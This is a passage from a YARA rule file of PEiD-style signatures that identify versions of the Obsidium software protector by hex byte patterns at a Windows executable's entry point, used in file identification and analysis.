03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1334_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B ?? 24 0C EB 01 ?? 83 ?? B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1300_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1355_Obsidium_Softwarenbsp_nbsp_SignByfly_20080411: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 ?? ?? ?? ?? EB 01 ?? E8 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1111_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1333_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1338_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1360_Obsidium_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? 50 EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 1F EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 01 ?? 64 FF 30 EB 04 ?? ?? ?? ?? 64 89 20 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 ?? 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 02 ?? ?? EB 02 ?? ?? 64 8F 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1322_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1354_Obsidium_Software_200800207: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 5B 28 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1336_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1258_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 7B 21 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1336_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 }\r\n        $b = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1322_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1353_Obsidium_Software_20080120: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2B 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1360_Obsidium_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? 50 EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 1F EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 01 ?? 64 FF 30 EB 04 ?? ?? ?? ?? 64 89 20 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 ?? 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 02 ?? ?? EB 02 ?? ?? 64 8F 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1341_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1334_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1353_Obsidium_Software_SignByfly_20080120: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2B 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 }\r\n        $b = { EB 02 ?? ?? E8 2B 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1354_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Softwarenbsp_nbsp_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 C3 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V125_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1361_Obsidium_Software_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 ?? EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 64 FF 30 EB 04 ?? ?? ?? ?? 64 89 20 EB 01 ?? EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 01 ?? EB 03 ?? ?? ?? 64 8F 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? 58 EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12X_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 33 C0 8B 54 24 0C 83 82 B8 00 00 00 0D C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1332_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 3B 27 00 00 }\r\n        $b = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_vxxxx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 47 19 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1200_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 3F 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1333_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1339_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V130X_Obsidium_Software_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B ?? ?? ?? EB 04 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1304_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13017_Obsidium_software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1332_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 3B 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1354_Obsidium_Software_SignByfly_200800207: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 5B 28 00 00 }\r\n        $b = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1322_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1331_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1300_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 